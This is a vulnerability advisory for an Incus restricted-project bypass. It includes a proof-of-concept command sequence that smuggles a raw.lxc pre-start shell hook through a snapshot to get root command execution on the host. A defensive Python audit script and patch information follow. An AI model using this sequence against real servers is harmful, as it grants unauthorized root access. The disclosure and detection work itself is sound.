CVE-2026-48751
Incus has a restricted project bypass leading to arbitrary command execution
Description

### Summary

Instance snapshots ignore the `restricted.containers.lowlevel=block` setting, allowing arbitrary command execution on the Incus server by abusing low-level hooks such as `raw.lxc` and `raw.qemu`.

### Details

As snapshots can be moved from one server to another, a malicious instance and snapshot can be crafted locally, moved to a restricted project, and the snapshot restored for arbitrary command execution.

In practice, this allows a malicious actor to execute arbitrary commands on the host with root privileges.

### PoC

```
# remote, restricted
incus project set rem:project restricted=true
incus project set rem:project restricted.containers.lowlevel=block

# locally, unrestricted project
incus init images:debian/trixie rce-raw-lxc
incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id >/lxc-hook-prestart"'
incus snapshot create rce-raw-lxc snap0
#> allow transfer to restricted project
incus config unset rce-raw-lxc raw.lxc

# locally, transfer and trigger
incus move rce-raw-lxc rem: --mode push
incus snapshot restore rem:rce-raw-lxc snap0
incus start rem:rce-raw-lxc
```

### Impact

- Bypass of project restrictions.
- Arbitrary command execution on the Incus server.
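The bypass described above depends on a snapshot carrying a low-level key that the live instance no longer has, so an audit of a restricted project has to read each snapshot's own config. The following is an added example, not code from the advisory or from the Incus project; it assumes instance records shaped like the JSON from `incus list --format json` (a `snapshots` array whose entries have `name` and `config`), and the function names and sample data are constructed for illustration.

```python
import json

# The two low-level keys named in the advisory; extend the tuple as needed.
LOWLEVEL_KEYS = ("raw.lxc", "raw.qemu")


def project_blocks_lowlevel(project_config):
    """True when the project is restricted and low-level options are blocked."""
    if project_config.get("restricted") != "true":
        return False
    # Assumption: an unset restricted.containers.lowlevel is treated as "block".
    return project_config.get("restricted.containers.lowlevel", "block") == "block"


def audit_snapshots(project_config, instances):
    """Return (instance, snapshot, key, value) for every low-level key
    found in a snapshot's config inside a project that blocks such keys."""
    if not project_blocks_lowlevel(project_config):
        return []
    findings = []
    for inst in instances:
        for snap in inst.get("snapshots") or []:
            cfg = snap.get("config") or {}
            for key in LOWLEVEL_KEYS:
                if key in cfg:
                    findings.append((inst["name"], snap["name"], key, cfg[key]))
    return findings


# Constructed sample: the live config of "c1" is clean, its snapshot is not.
SAMPLE_PROJECT = {"restricted": "true", "restricted.containers.lowlevel": "block"}
SAMPLE_INSTANCES = json.loads("""
[
  {"name": "c1", "config": {"image.os": "Debian"},
   "snapshots": [{"name": "snap0",
                  "config": {"image.os": "Debian",
                             "raw.lxc": "<constructed value>"}}]},
  {"name": "c2", "config": {}, "snapshots": null}
]
""")

if __name__ == "__main__":
    for inst, snap, key, value in audit_snapshots(SAMPLE_PROJECT, SAMPLE_INSTANCES):
        print(f"{inst}/{snap}: {key} = {value!r} present in a lowlevel=block project")
```

Any finding means the snapshot should be deleted or inspected before it is restored, whether or not the server has been upgraded.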
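How to fix CVE-2026-48751
To fix CVE-2026-48751, upgrade the affected packages to the patched versions listed below.
- —no patched version listed
- —no patched version listed
- —upgrade to 7.2.0 or later
Is CVE-2026-48751 being exploited?
There are currently no exploitation signals. CVE-2026-48751 is not in CISA KEV and has no recent EPSS score.
Affected packages (3)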
- from 0